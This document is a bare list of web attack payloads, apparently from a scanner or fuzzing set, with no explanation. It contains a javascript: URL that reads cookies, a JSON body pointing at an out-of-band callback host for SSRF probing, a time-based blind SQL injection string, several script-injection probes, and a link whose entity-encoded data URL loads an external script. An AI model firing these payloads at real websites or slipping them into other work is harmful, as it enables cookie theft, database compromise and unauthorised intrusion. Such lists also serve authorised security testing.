javascript:alert(document.cookie)

{"data":{"url":"https://nof9v31iozd9544rfyufj7bmodu5iv6k.oastify.com"}}

'XOR(if(now()=sysdate(),sleep(5*5),0))OR'

<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->

<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>


<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
